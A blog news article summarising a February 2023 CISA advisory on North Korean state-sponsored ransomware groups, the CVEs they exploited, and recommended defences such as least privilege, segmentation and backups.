North KOREA Ransomware Attacks, A Global Threat.? US Warns.

North KOREA Ransomware Attacks, Should We Be Afraid.? US Warns.

There has been a recent warning from The United States Cybersecurity and Infrastructure Security Agency (CISA), against the attacks towards critical infrastructures as a result of the state-sponsored ransomware attacks by the Korean nation-state.

As a proactive campaign promoting the fight against ransomware using the #StopRansomeware CISA effectively collaborated with various international bodies such as the Republic of Korea (ROK), NSA (National Security Agency), the Federal Bureau of Investigation (FBI), National Intelligence Service (NIS), Department of Health and Human Services (HHS), and ROK Defense Security Agency (DSA).

The report was made on Thursday 09-February-2023. Technical reports that built on the Alert (AA22-187A) by CISA on July 06-2022, summarizing the state sponsored ransomware hacker group in the Democratic Republic of Korea (DPRK).

Additional information provided in the document shows the analysis of the activities were conducted by two groups known as the Maui and H0lyGh0st groups. Perceptible tactics, techniques and procedures (TTP) described by CISA on the methods which the attack is conducted, includes acquiring infrastructures ranging from domains, credentials, accounts, and personal identities stolen.

Information states that the attackers (threat actors) made acquisition of virtual private networks (VPN’s), and servers which IP addresses corresponds to that of third-world countries in other to keep their actual location anonymous. Furthermore, exploits such as  (e.g., CVE 2021-44228CVE-2021-20038, and CVE-2022-24990), these are security flaws associated with Apache Log4j, SonicWall, and TerraMaster NAS appliances, were carried out using customized payloads allowing the attacker perform reconnaissance (information gathering) with various techniques as well as executing shell commands.

The payloads are associated with privately built ransomware by the attackers using ready-made tools e.g. (bitlocker, Deadbolt, YourRansom, ech0raix etc. which are capable of encrypting files. After modification a renowned deceptive method of distributing malware known as Trojan horse in the messenger app known as X-Popup targeting both medium and small size medical-firms in south Korea, was adopted.  


The United States CISA recommends that principle of least privilege should be adapted. Organizations are advised to disable network devices that are not in use, while practising multi-layer network segmentation, that utilizes phishing-resistant authentication controls, and as well as periodically backup their data’s.

An overwhelming data breach shows that digital assets worth $630-million united states dollars, were compromised .

Roman Arutyunov, co-founder of  Xage Security, advised that critical infrastructure providers should adopt these changes although implementing them can seem to be complicated.

According to the UNITED NATIONS (AP) panels consisting of experts reported on Tuesday 7th February 2023, that the threat actors adopted techniques quite sophisticated to gain access to various digital networks in the cyberfinance criminally obtaining information’s that are quite beneficial to the North Korean nuclear ballistic programs spanning in both government, individual, and multinational companies.   



Please do let us know in the comment section what are your thoughts about this.

Find this article and information helpful? Show some love and support  “Click-Here”
0 0 votes
Article Rating
Notify of
Inline Feedbacks
View all comments